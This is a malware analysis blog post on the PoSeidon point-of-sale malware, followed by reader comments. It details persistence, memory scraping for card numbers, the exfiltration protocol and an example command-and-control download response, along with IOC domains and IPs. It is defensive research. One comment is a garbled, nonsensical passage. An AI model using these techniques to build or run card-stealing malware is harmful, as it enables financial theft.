This post was authored by Andrea Allievi, Ben Baker, Nick Biasini, JJ Cummings, Douglas Goddard, William Largent, Angel Villegas, and Alain Zidouemba
Cisco’s Security Solutions (CSS) consists of information security experts with a unique blend of law enforcement, enterprise security and technology security backgrounds. The team works directly with Cisco’s Talos Security Intelligence & Research Group to identify known and unknown threats, quantify and prioritize risk, and minimize future risk.
When consumers make purchases from a retailer, the transaction is processed through Point-of-Sale (PoS) systems. When a credit or debit card is used, a PoS system is used to read the information stored on the magnetic stripe on the back of the credit card. Once this information gets stolen from a merchant, it can be encoded into a magnetic stripe and used with a new card. Criminal markets exist for this valuable information because the attackers are able to easily monetize stolen credit card data. Incidents involving PoS malware have been on the rise, affecting many large organizations as well as small mom-and-pop establishments and garnering a lot of media attention. The presence of large amounts of financial and personal information ensures that these companies and their retail PoS systems will remain attractive targets.
Overview
There is a new malware family targeting PoS systems, infecting machines to scrape memory for credit card information and exfiltrate that data to servers, also primarily .ru TLD, for harvesting and likely resale. This new malware family, that we’ve nicknamed PoSeidon, has a few components to it, as illustrated by the diagram below:
At a high level, it starts with a Loader binary that upon being executed will first try to maintain persistence on the target machine in order to survive a possible system reboot. The Loader then contacts a command and control server, retrieving a URL which contains another binary to download and execute. The downloaded binary, FindStr, installs a keylogger and scans the memory of the PoS device for number sequences that could be credit card numbers. Upon verifying that the numbers are in fact credit card numbers, keystrokes and credit card numbers are encoded and sent to an exfiltration server.
Technical details
Keylogger
The file with SHA256 334079dc9fa5b06fbd68e81de903fcd4e356b4f2d0e8bbd6bdca7891786c39d4 could perhaps be at the source of the PoS system compromise. We call this file KeyLogger based on debugging information found in the binary:
Upon execution, this file copies itself to either %SystemRoot%\system32\<filename>.exe or %UserProfile%\<filename>.exe and adds registry entry under HKLM (or HKCU)\Software\Microsoft\Windows\CurrentVersion\Run.
The file also opens HKCU\Software\LogMeIn Ignition and enumerates the keys for the account sub key, opens it and deletes the PasswordTicket Value and obtains the Email Value. Also deletes registry tree HKCU\Software\LogMeIn Ignition\<key>\Profiles\* .
The file sends to an exfiltration server by POSTing data to one of these URIs:
- wondertechmy[.]com/pes/viewtopic.php
- wondertechmy[.]ru/pes/viewtopic.php
- wondwondnew[.]ru/pes/viewtopic.php
The URI format is
uid=%I64u&win=%d.%d&vers=%s
The Keylogger component was potentially used to steal passwords and could have been the initial infection vector.
Loader
The loader for the PoSeidon PoS malware gets its name from debugging information found in the binary:
Upon being run, Loader checks to see if it’s being executed with one of these two file names:
- WinHost.exe
- WinHost32.exe
If it is not, it will make sure that no Windows service is running with the name WinHost. Loader will copy itself to %SystemRoot%\System32\WinHost.exe, overwriting any file in that location that would happen to have the same name. Next, Loader will start a service named WinHost.
This is done so that it remains running in memory even if the current user logs off. If Loader is not able to install itself as a service, it will try to find other instances of itself running in memory and terminate them. Subsequently, it will copy itself to %UserProfile%\WinHost32.exe and install the registry key HKCU\Microsoft\Windows\CurrentVersion\Run\\WinHost32. Finally, it will create a new process to execute %UserProfile%\WinHost32.exe.
Now that persistence has been achieved, Loader will delete itself by running the following command:
- cmd.exe /c del <path_to_itself> >> NUL
The instance of Loader running in memory attempt to read configuration data at %SystemRoot%\System32\WinHost.exe.cfg. This file can hold a list of URLs to be added to a list of hardcoded URLs already contained in Loader.
Loader then attempts to contact one of the hardcoded C&C server:
- linturefa.com
- xablopefgr.com
- tabidzuwek.com
- lacdileftre.ru
- tabidzuwek.com
- xablopefgr.com
- lacdileftre.ru
- weksrubaz.ru
- linturefa.ru
- mifastubiv.ru
- xablopefgr.ru
- tabidzuwek.ru
Associated IP Addresses:
- 151.236.11.167
- 185.13.32.132
- 185.13.32.48
- REDACTED at request of Federal Law Enforcement
- 31.184.192.196
- 91.220.131.116
- 91.220.131.87
If one of the domains above resolve to an IP address an HTTP POST is made using the following user-agent string:
Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0)
POST data is sent to either:
- <IP ADDRESS>/ldl01/viewtopic.php
- <IP ADDRESS>/pes2/viewtopic.php
POST data follows the format:
uid=%I64u&uinfo=%s&win=%d.%d&bits=%d&vers=%s&build=%s
Loader expects the following response from the C&C server:
{<CommandLetter>:<ArgumentString>}
Example response:
- {R:http://badguy.com/malwarefilename.exe}
- {b:pes13n|373973303|https://01.220.131.116/ldl01/files/pes13n.exe}
It’s by fetching and executing the executable referenced in the server response that the second part of PoSeidon finds its way to the PoS device.
FindStr
The loader for the PoSeidon PoS malware gets its name from debugging information found in the binary:
An embedded PE is extracted through shellcode and execution continues with the embedded binary. This file installs a minimal keylogger that is implemented similarly to the description found here. The data intercepted by this keylogger will later be sent to an exfiltration server.
The PE then cycles through all running processes on the PoS device to look for processes with a security token not associated with the “NT AUTHORITY” domain name. It iterates through all read/write pages within those processes for credit card info.
The malware only looks for number sequences that start with:
- 6, 5, 4 with a length of 16 digits (Discover, Visa, Mastercard)
- 3 with a length of 15 digits (AMEX)
It then uses the Luhn algorithm to verify that the numbers are actually credit or debit card numbers as shown by the code segment below:
Next, DNS resolution is attempted for the domains below. These are some of the known data exfiltration servers:
- quartlet.com
- horticartf.com
- kilaxuntf.ru
- dreplicag.ru
- fimzusoln.ru
- wetguqan.ru
If one of the domains above resolve to an IP address an HTTP POST is made using the following user-agent string:
Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0)
POST data is sent to:
<IP ADDRESS>/pes13/viewtopic.php
Data follows the following format:
oprat=2&uid=%I64u&uinfo=%s&win=%d.%d&vers=%s
optional POST data (data: credit card numbers, logs: keylogger data)
&data=<XORed_with_0x2A_then_base64_data_unk>
&logs=<XORed_with_0x2A_then_base64_data_unk>
Credit card numbers and keylogger data is sent to the exfiltration server after being XORed and base64 encoded.
The expect response from the exfiltration server is:
This mechanism allows for the the malware to update itself, based on commands received from the exfiltration server.
Loader vs FindStr
Comparing an unpacked copy of Loader version 11.4 to an unpacked copy of FindStr version 7.1 with Bindiff shows that 62% of the functionality in both samples is the same. The actors behind this malware probably developed some core functionality and compiled it into a library to be used by other projects they are developing.
IOC
Win.Trojan.PoSeidon.RegistryItem.ioc
Win.Trojan.PoSeidon.ProcessItem.ioc
Win.Trojan.PoSeidon.FileItem.ioc
Domains
- linturefa.com
- xablopefgr.com
- tabidzuwek.com
- linturefa.ru
- xablopefgr.ru
- tabidzuwek.ru
- weksrubaz.ru
- mifastubiv.ru
- lacdileftre.ru
- quartlet.com
- horticartf.com
- kilaxuntf.ru
- dreplicag.ru
- fimzusoln.ru
- wetguqan.ru
IP Addresses:
- 151.236.11.167
- 185.13.32.132
- 185.13.32.48
- REDACTED at request of Federal Law Enforcement
- 31.184.192.196
- 91.220.131.116
- 91.220.131.87
- REDACTED at request of Federal Law Enforcement
Conclusion
PoSeidon is another in the growing number of Point-of-Sale malware targeting PoS systems that demonstrate the sophisticated techniques and approaches of malware authors. Attackers will continue to target PoS systems and employ various obfuscation techniques in an attempt to avoid detection. As long as PoS attacks continue to provide returns, attackers will continue to invest in innovation and development of new malware families. Network administrators will need to remain vigilant and adhere to industry best practices to ensure coverage and protection against advancing malware threats.
Snort Rules: 33836-33852. Please refer to Defense Center or FIREsight management console for updated information.
Protecting Users from These Threats
We encourage organizations to consider security best practices, starting with a threat-centric approach. Given the dynamic threat landscape, we advocate this threat-centric and operationalized approach that implements protections across the extended network – and across the full attack continuum – before, during, and after an attack. This approach is predicated upon superior visibility, continuous control, and advanced threat protection across the extended network and the entire attack continuum
“REDACTED at request of Federal Law Enforcement”
What’s that?
There is probobly an on going investigation being conducted by law enforcment agencies. They don’t want that IP or domain name revealed in case it impacts on their investigation.
That is beyond stupid.
When malware authors read this article, they will know what IPs have been [redacted] and not listed in the report and just null those IPs out and start using new ones…
This isn’t just for the Malware authors but also for the general snoopy people on the Internet. Botnet C2C traffic may get adulterated by thousands more connections thereby hindering investigations.
non rekvalite sitems uniti problems v doskonalenie sistemi kattorie bolhe net na simle besapasnastie nasagelaveka na sypytnika skanivanie is kosmasa nasa ani twklycat orussie kalignie rakety simy ynigtassenie nacii gelaweka na 2018 v okeani pretupas ressdenie was kto iuslessit ifarmaciua amerika prinala resultat unitassenia nacii myslman katowi a rakety masowi parassenie evropi ungtahenie myssicow na simle bydte bititelnie reformcii
The file path is definitely windows. Do we know if this malware can remain persistent on an embedded XP system or just a full Windows install? Thx
We have seen this malware establish persistence on both embedded Windows XP and Windows 7 systems.
It will be nice when…
the information scraped from the POS terminals is either no longer valid, and/or can only be used by the first merchant to ‘claim’ the card number (and not be used over and over again). Tokenization is the key.
Final -a startup located in Mtn. View, CA is working on this. Check out: getfinal (dot) com.
I think Apple has already figured this out with Apple Pay..
You mean google wallet?
How does these PoS systems get infected?
It is uncommon to search web pages or receive emails on Pay terminals. So USB? (not very effective?) or not updated system -> exploit?
Mildar is on point. How is this malware propagating? What’s the attack vector.
Likely USB or the like, you’d be surprised how effective localized infection vectors can be. Ask Target.
Can you please provide MD5 Hash for IOC’s above?
Authors, thank you for this well written information.
I’m really interested to know whether the Loader service stays resident once the attack is underway?
In that case, I think the simplest way to detect an infected system would be to che for the registered device name ‘WinHost(32)?’… Correct?
Thanks
Correction; service name “WinHost”….
To answer the question about how stations get infected. Many POS malware infections start with insecure remote access. For example, over the past 12 months, LogMeIn was used insecurely by several POS companies. An account was breached, and the hacker was able to access 100’s of POS stations in an unattended mode. There are ways to use these tools correctly, but many do not. For more data about this, look at the Department of Homeland Security brief: http://www.us-cert.gov/sites/default/files/publications/BackoffPointOfSaleMalware.pdf